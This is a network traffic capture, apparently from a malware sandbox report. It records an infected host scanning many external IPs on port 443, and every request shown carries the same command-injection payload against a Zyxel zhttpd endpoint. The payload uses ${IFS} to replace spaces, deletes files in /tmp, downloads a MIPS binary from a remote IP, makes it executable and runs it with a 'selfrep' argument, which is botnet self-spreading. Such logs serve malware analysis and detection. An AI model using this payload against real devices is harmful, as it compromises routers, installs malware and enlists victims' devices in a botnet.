                                                Jan 12, 2024 18:16:03.038502932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                235192.168.2.2347360108.82.83.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038564920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                236192.168.2.235062087.181.181.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038615942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                237192.168.2.2339616128.50.93.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038647890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                238192.168.2.2341160169.20.114.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038702011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                239192.168.2.233485478.218.196.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038772106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                240192.168.2.2344928132.197.57.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038827896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                241192.168.2.2353912173.68.207.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038888931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                242192.168.2.234897847.9.131.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038922071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                243192.168.2.2345378152.216.213.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038980961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                244192.168.2.2360616149.99.89.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039045095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                245192.168.2.234219290.55.24.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039067030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                246192.168.2.235408840.92.56.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039108992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                247192.168.2.2333510116.22.197.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039154053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                248192.168.2.233378048.84.209.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039154053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                249192.168.2.2334598163.185.167.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039196014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                250192.168.2.233994861.117.24.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039213896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                251192.168.2.2343474112.153.78.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039242029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                252192.168.2.2351812122.120.255.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039297104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                253192.168.2.23487269.42.173.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039315939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                254192.168.2.233891646.230.131.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039374113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                255192.168.2.233915437.108.64.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039407015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                256192.168.2.23512322.111.105.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039432049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                257192.168.2.2334520117.30.227.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039465904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                258192.168.2.2349418194.84.131.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039506912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                259192.168.2.2349072159.176.128.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039532900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                260192.168.2.2358932116.134.225.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039577007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                261192.168.2.2352638129.181.204.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039632082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                262192.168.2.2354430109.243.252.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039676905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                263192.168.2.2345746159.170.235.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039704084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                264192.168.2.234075292.207.55.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039742947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                265192.168.2.233840074.64.65.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039793015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                266192.168.2.2345762136.191.95.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039815903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                267192.168.2.2353940161.53.149.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039891005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                268192.168.2.2338474202.170.174.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039912939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                269192.168.2.236038649.165.245.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039920092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                270192.168.2.2339124154.189.121.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.039954901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                271192.168.2.233296680.75.110.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040009022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                272192.168.2.2347424194.152.174.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040065050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                273192.168.2.233351498.239.155.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040110111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                274192.168.2.2360324191.180.75.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040155888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                275192.168.2.23553288.168.3.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040189028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                276192.168.2.2345498217.125.181.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040225983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                277192.168.2.2351152141.147.244.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040256977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                278192.168.2.233807678.179.235.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040316105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                279192.168.2.235024640.244.199.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040348053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                280192.168.2.2356486190.241.161.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040384054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                281192.168.2.234743036.20.169.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040441990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                282192.168.2.2339862130.241.118.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040472031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                283192.168.2.234718017.42.28.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040497065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                284192.168.2.234400644.167.71.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040554047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                285192.168.2.2346528101.132.172.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040615082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                286192.168.2.2353452117.100.67.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040622950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                287192.168.2.2360342126.255.232.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040666103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                288192.168.2.2356412133.252.200.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040721893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                289192.168.2.233665888.232.159.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040781975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                290192.168.2.2354296139.219.24.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040827990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                291192.168.2.234623079.119.254.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040867090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                292192.168.2.2352366202.68.195.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040888071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                293192.168.2.235769227.60.10.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.040918112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                294192.168.2.233355220.1.26.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:04.046008110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                295192.168.2.2334602112.22.247.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:04.046052933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                296192.168.2.2342284145.233.19.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:04.046113968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                297192.168.2.2337680122.59.197.143443
                                                TimestampBytes transferredDirectionData
